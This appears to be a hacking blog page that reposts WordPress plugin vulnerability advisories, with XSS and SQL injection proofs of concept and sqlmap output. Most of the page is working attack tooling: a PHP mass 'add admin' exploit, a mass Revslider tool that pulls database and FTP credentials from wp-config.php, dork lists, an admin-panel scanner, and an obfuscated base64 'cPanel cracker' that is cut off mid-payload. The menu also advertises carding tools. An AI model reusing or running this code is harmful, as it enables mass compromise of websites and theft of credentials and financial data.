Kaptan White Hat: Exploit

# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps

1. Description

On the registration form the address field is not validated before returning it to the user.
Visiting the Directory page, will show the confirm window.

2. Proof of Concept

POST /wordpress/index.php/2015/05/21/church_admin-registration-form/

save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134

GET /wordpress/index.php/2015/05/21/church_admin-directory/

<header class="entry-header">
<h1 class="entry-title">church_admin directory</h1> </header>
<div class="entry-content">
<p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
<div class="church_admin_name_address" >
<p><span itemprop="name"><strong>test test</strong></span></p>
<p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div>
<div class="church_admin_phone_email">
<p> <a class="email" href="tel:+3670">+3670</a><br/>
<a class="email" href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>

</p>

</div>

3. Solution

Fixed in version 0.810.

Devamını Oku..

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/newstatpress/ # Active installs: 20,000+ # Vulnerable version: 0.9.8 # Fixed version: 0.9.9 # CVE: CVE-2015-4062, CVE-2015-4063 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] (CVE-2015-4062) ----------------------------------------------- * CODE: includes/nsp_search.php:94 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) { if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) { $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'"; } } +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1 [............] GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 89 HTTP(s) requests: --- Parameter: where1 (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search --- [12:25:59] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated XSS [CWE-79] (CVE-2015-4063) ---------------------------------------------- includes/nsp_search.php:128 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) { if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; } } +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search Timeline ========== 2015-05-09: Discovered vulnerability. 2015-05-19: Vendor notification. 2015-05-19: Vendor response. 2015-05-20: Vendor fix. 2015-05-25: Public disclosure.

Devamını Oku..

# Title: SQLi vulnerabilities in WordPress plugin "GigPress" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/gigpress/ # Active installs: 20,000+ # Vulnerable version: 2.3.8 # Fixed version: 2.3.9 # CVE: CVE-2015-4066 Vulnerabilities (2) ===================== (1) Authenticated SQLi [CWE-89] ------------------------------- * CODE: admin/handlers.php:87 +++++++++++++++++++++++++++++++++++++++++ $show['show_tour_id'] = $_POST['show_tour_id']; +++++++++++++++++++++++++++++++++++++++++ admin/handlers.php:94 +++++++++++++++++++++++++++++++++++++++++ $artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . ""); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php POST DATA: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql [............] POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 72 HTTP(s) requests: --- Parameter: show_artist_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new --- [12:21:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 +++++++++++++++++++++++++++++++++++++++++ (2) Authenticated SQLi [CWE-89] ------------------------------- * CODE: admin/handlers.php:71 +++++++++++++++++++++++++++++++++++++++++ $show['show_venue_id'] = $_POST['show_venue_id']; +++++++++++++++++++++++++++++++++++++++++ admin/handlers.php:95 +++++++++++++++++++++++++++++++++++++++++ $venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A); +++++++++++++++++++++++++++++++++++++++++ * POC: http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php POST DATA: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql [............] POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 72 HTTP(s) requests: --- Parameter: show_venue_id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new --- [12:23:57] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0 +++++++++++++++++++++++++++++++++++++++++ Timeline ======== 2015-05-09: Discovered vulnerability. 2015-05-20: Vendor notification. 2015-05-20: Vendor response and fix. 2015-05-25: Public disclosure.

Devamını Oku..

[+]Main Menu[+]

Home
Contact Me
Request Tools
Haurgeulis Security
Haurgeulis48
Falcon-G21 Blog
Donate Me

[+]Balitbang Tool Exploit[+]

Balitbang Remote File Upload
Password Encode - Decode

[+]Joomla Tool Exploit[+]

Com User Auto Register
Com User Scanner
Com Sexycontactform
Simple Photo Gallery

[+]Misc Tools[+]

Admin Finder
Auto Fake Rooting
DNS Checker
E-mail Extrator
Hash Cracker
Reseverd - IP
SQL Scanner
Website Whois

[+]Schoolhos Tool Exploit[+]

Add Admin
File Upload V1
File Upload V2
File Upload V3
File Upload V4
File Upload V5
File Upload V6
File Upload V7

[+]Wordpress Tool Exploit

Acento Themes Exploit
All in One Themes Exploit
Felis Themes Exploit
Formcraft V1 Plugin Exploit
Formcraft V2 Plugin Exploit
FR0 Themes Exploit
i-Dump Plugin Exploit
Jquery-File-Upload Plugin Exploit
Markant Themes Exploit
MichaelCanthony Themes Exploit
Mobile Edition 2.7 Themes Exploit
NativeChruch Themes Exploit
Revslider Plugin Exploit
Sexy-contactfrom Plugin Exploit
Shortcode Plugin Exploit
Shorttermbraces Themes Exploit
Theloft Themes Exploit
Trinity Themes Exploit
UrbanCity Themes Exploit

[+]Carding Tools[+]

CCN Gate 1 Checker
CCN Gate 2 Checker
CCN Gate 3 Checker
CCN Gate 4 Checker
CCN Gate 5 Checker
Extrap
Amzon E-mail Checker
Apple E-mail Checker
CashU E-mail Checker
Ebay E-mail Checker
Money Bookers E-mail Checker
Paypal E-mail Checker
Paypal Checker

Devamını Oku..

<?php
 
/*
coded by Mr.MaGnoM
all rights reserved . dont chabge it
made in morocco
23/09/2013
 
visit my blog : http://www.nob24.com/
*/
 
print"
+---------------------------------------------------+
|            mass exploiting for exploit            |
| WordPress 0day - Hades Plus Framework Add Admin   |
|     exploit :http://1337day.com/exploit/22660     |
|    Coded by Mr.MaGnoM  -- twitter : @MrMaGnoM     |
|   visit my blog : http://www.nob24.com/     |
|       usage php $argv[0] list.txt theme           |
|    exampl : php mass.php list.txt archin          |
+---------------------------------------------------+\n
";
 
 if(!$argv[1] and !$argv[2] ){
   die("usage php $argv[0] list.txt theme\n");
 }
 
$get=@file_get_contents($argv[1]);
$expl=explode("\n", $get);
 
foreach ($expl as $key) {
        $link="$key/wp-content/themes/$argv[2]/hades_framework/option_panel/ajax.php";
        echo "\n\tsite : $key ";
        adduser($link);
}
 
function adduser($site){
$ch = curl_init(
"$site");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(
"values[0][name]" => "users_can_register",
"values[0][value]" => "1",
"values[1][name]" => "admin_email",
"values[1][value]" => "here ur email",
"values[2][name]" => "default_role",
"values[2][value]" => "administrator",
"action" => "save",
"submit" => "submit"
));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
if($result=="success"){
        echo "\n\texploit : $result  \n";
        }else{
                echo "\n\texploit : no \n";
                }
}
?>

Devamını Oku..

<?
echo"
<body bgcolor='#000000' text='white'>
<title>Mass Revslider Exl0it1ng</title>
<style>
body,table{background: black; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,textarea,table,td,tr,#gg
{
border-style:solid;
text-decoration:bold;
}
input:hover,tr:hover,td:hover,textarea:hover
{
background-color: #FFFFCC;
color:green;
size:10px;
}
</style>
<center><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSjfAs7Cqc8Gq6GTxefRk9Tt0gcWFS2B1kIgYFBs8H24UuC3UYMoA' height='150' width='150'></img><br>
<!--- Menu -----!--->
<p align='center' dir='ltr'>
<font face='Verdana' size='2' color='#FFFFFF'>#
<a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~ 
<a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> # </font>
<br><br>
";


/////////////////////////////////
if ($_GET['dz'] == 'exp') {
echo"<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>";
function findit($mytext,$starttag,$endtag) {
 $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
 $posRight = stripos($mytext,$endtag,$posLeft+1);
 return  substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if($ya){
 $e=explode("\r\n",$co);
 foreach($e as $bda){
    //echo '<br>'.$bda;
    /// you can devlope the tool ///
    $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
    $dn=($bda).($linkof);
    $file=@file_get_contents($dn);
    if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
    echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
    echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
    echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
    echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
    echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
    echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
    }
    elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
    echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
    echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";    
    echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
    echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
    echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
    echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
    }
    else{
    echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';    
    echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
    echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
 }
 
}
}
/////////////////////////////////////

/////////////////////////////////////
if ($_GET['dz'] == 'dorks') {
echo'<br><textarea cols=50 rows=12 >
inurl:wp-content/plugins/revslider/
inurl:revslider
inurl:revslider_admin.php
inurl:revslider_front.php
inurl:plugins/revslider/
intext:Powered by Revslider
intitle:"Index Of/ revslider"
intitle:"Index Of/wp-content/themes/revslider"
intitle:"Index Of/wp-content/plugins/revslider"
intitle:"Index Of/admin/revslider"
intitle:"Index Of/fr/revslider"
intitle:"Index Of/en/revslider"
intitle:"Index Of/us/revslider"
intitle:"Index Of/ar/revslider"
intitle:"Index Of/es/revslider"
intitle:"Index Of/de/revslider"
</textarea>';

}
//////////////////////////////////////

//////////////////////////////////////
if ($_GET['dz'] == 'toip') {
echo"
<form method='post' ><center>
<textarea cols='50' rows='12' name='site2ip' >www.example.com
Please Romove http:// or https://</textarea></br><br>
<input type='submit' name='w2ip' value='Extract' ><br>
</center>";
if(isset($_POST['site2ip'])){ 
foreach(explode("\n",$_POST['site2ip']) as $site4ip){ 
$ipp=trim($site4ip);
echo '<font color="red" size="3"></font><font color="green" size="5"><center>
<font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
<font color=white face=Verdana size=-2>  ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>'; 
}
}
}
////////////////////////////////////

////////////////////////////////////
if ($_GET['dz'] == 'db') {


echo'
<form action ="" method="post">
<font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>';
$site = $_POST['site'];
$list = array(
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/DB_ADMIN/',
'/db_admin/',
'/DBA/',
'/SQLI/',
'/dba/',
'/sqli/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/dev/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
'/PhpMyAdmin/',
'/phpmyadmin/',
'/myadmin/',
'/mysql/',
'/sql/',
'/server/',
'/db/',
'/database/',
'/databases/',
'/adm/',
'/configuration/',
'/configure/',
'/administrator/',
'/login/',
'/moderator/',
'/controlpanel/',
'/adminpanel/',
'/admincontrol/',
'/fileadmin/',
'/data/',
'/postgresql/',
'/oracle/',
'/msssql/',
'/msaccess/',
'/sysadmin/',
'/serverdata/',
'/webadmin/',
'/admins/',
'/Database_Administration/',
'/WebAdmin/',
'/useradmin/',
'/sysadmins/',
'/admin1/',
'/system-administration/',
'/administrators/',
'/pgadmin/',
'/directadmin/',
'/staradmin/',
'/ServerAdministrator/',
'/SysAdmin/',
'/administer/',
'/LiveUser_Admin/',
'/sys-admin/',
'/typo3/',
'/panel/',
'/xlogin/',
'/smblogin/',
'/phpldapadmin/',
'/server_admin/',
'/database_administration/',
'/system_administration/',
'/ss_vms_admin_sm/',
'/adminarea/',
'/MySQL/',
'/mysql_admin/',
'/server_data/',
'/DB/',
'/DB1/',
'/DB2/',
'/DB3/',
'/DB4/',
'/DB5/',
'/DB6/',
'/DB7/',
'/DB8/',
'/DB9/',
'/DB0/',
'/db1/',
'/db2/',
'/db3/',
'/db4/',
'/db5/',
'/db6/',
'/db7/',
'/db8/',
'/db9/',
'/db0/',
'/mysql5/',
'/mysql4/',
'/root/',
'/apache/',
'/php/',
'/Apache/',
'/Php/',
'/apach/',
'/apachepanel/',
'/WEBSERVERS/',
'/DATABASE1/',
'/DATABASE2/',
'/DATABASE3/',
'/DATABASE4/',
'/DATABASE5/',
'/DATABASE6/',
'/DATABASE7/',
'/DATABASE8/',
'/DATABASE9/',
'/WEBDATA/',
'/WEB_DATA/',
'/webservers/',
'/database1/',
'/database2/',
'/database3/',
'/database4/',
'/database5/',
'/database6/',
'/database7/',
'/database8/',
'/database9/',
'/webdata/',
'/web_data/',
);

if(isset($site)){

foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/", $result)){
echo "<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
}
else if (preg_match("/401 Unauthorized/", $result)) {
echo "<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
echo "<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
}
}
echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
}


}
////////////////////////////////////





if ($_GET['dz'] == 'scan') {

echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://dz-amir@hotmail.com >dz-amir@hotmail.com </a>  ....</font></u></b>";
}




?>



<center>
<code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
<font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
</center>

Devamını Oku..

 <html>
 <title>KrimOu CPanel Cracker Script & Root Server...|</title>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<?php eval(base64_decode("CS8qDQoJMTk2MkNyYWNrZXIgQ29kZWQgQnkgQWtyYW0gU3RlbGxlIChEeiBNYWZpYSBUZWFtKQ0KCSovDQoJQHNldF90aW1lX2xpbWl0KDApOw0KCUBlcnJvcl9yZXBvcnRpbmcoMCk7DQoNCg0KCWVjaG8gJzxoZWFkPg0KDQogIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCmJhY2tncm91bmQtY29sb3I6IzAwMDAwMDsNCmJhY2tncm91bmQtaW1hZ2U6dXJsKCJodHRwOi8vaW01MC5ndWxmdXAuY29tL3hiY3FIZi5wbmciKTsNCmJhY2tncm91bmQtcmVwZWF0OnJlcGVhdDsNCm1hcmdpbi10b3A6MjBweDsNCmZvbnQtZmFtaWx5OiJBZ2VuY3kgRkIiOw0KZm9udC1zaXplOjEycHQ7IGNvbG9yOiNmZmZmZmY7DQoJfQ0KCWlucHV0LHRleHRhcmVhLHNlbGVjdHsNCglmb250LXdlaWdodDogYm9sZDsNCgljb2xvcjogI2NjY2NjYzsNCglkYXNoZWQgI2ZmZmZmZjsNCglib3JkZXI6IDFweA0KCXNvbGlkICMyQzJDMkM7DQoJYmFja2dyb3VuZC1jb2xvcjogIzA4MDgwOA0KCX0NCglhIHsNCgkJYmFja2dyb3VuZC1jb2xvcjogIzE1MTUxNTsNCgkJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgkJY29sb3I6ICMwMDA7DQoJCXRleHQtZGVjb3JhdGlvbjogbm9uZTsNCgkJZm9udC1zaXplOiAyMHB4Ow0KCQltYXJnaW46IDhweDsNCgkJcGFkZGluZzogNnB4Ow0KCQlib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCgl9DQoJYTpob3ZlciB7DQoJCWJhY2tncm91bmQtY29sb3I6ICMwODA4MDg7DQoJCXZlcnRpY2FsLWFsaWduOiBib3R0b207DQoJCWNvbG9yOiAjMzMzOw0KCQl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJCWZvbnQtc2l6ZTogMjBweDsNCgkJbWFyZ2luOiA4cHg7DQoJCXBhZGRpbmc6IDZweDsNCgkJYm9yZGVyOiB0aGluIHNvbGlkIGdyZWVuOw0KCX0NCgkuc3R5bGUxIHsNCgkJdGV4dC1hbGlnbjogY2VudGVyOw0KCQljb2xvcjogR3JlZW47DQoJfQ0KCS5zdHlsZTIgew0KCQljb2xvcjogR3JlZW47DQoJCWZvbnQtd2VpZ2h0OiBib2xkOw0KCQkJfQ0KCS5zdHlsZTMgew0KCQljb2xvcjogR3JlZW47DQoJCQl9DQoJLS0+DQoJPC9zdHlsZT4NCg0KCTwvaGVhZD4NCgknOw0KDQokR2V0Y29uZmlnID0gIkpIWnBjMmwwWXlBOUlDUmZRMDlQUzBsRld5SjJhWE5wZEhNaVhUc05DbWxtSUNna2RtbHphWFJqSUQwOUlDSWlLU0I3RFFvZ0lDUjJhWE5wZEdNZ0lEMGdNRHNOQ2lBZ0pIWnBjMmwwYjNJZ1BTQWtYMU5GVWxaRlVsc2lVa1ZOVDFSRlgwRkVSRklpWFRzTkNpQWdKSGRsWWlBZ0lDQWdQU0FrWDFORlVsWkZVbHNpU0ZSVVVGOUlUMU5VSWwwN0RRb2dJQ1JwYm1vZ0lDQWdJRDBnSkY5VFJWSldSVkpiSWxKRlVWVkZVMVJmVlZKSklsMDdEUW9nSUNSMFlYSm5aWFFnSUQwZ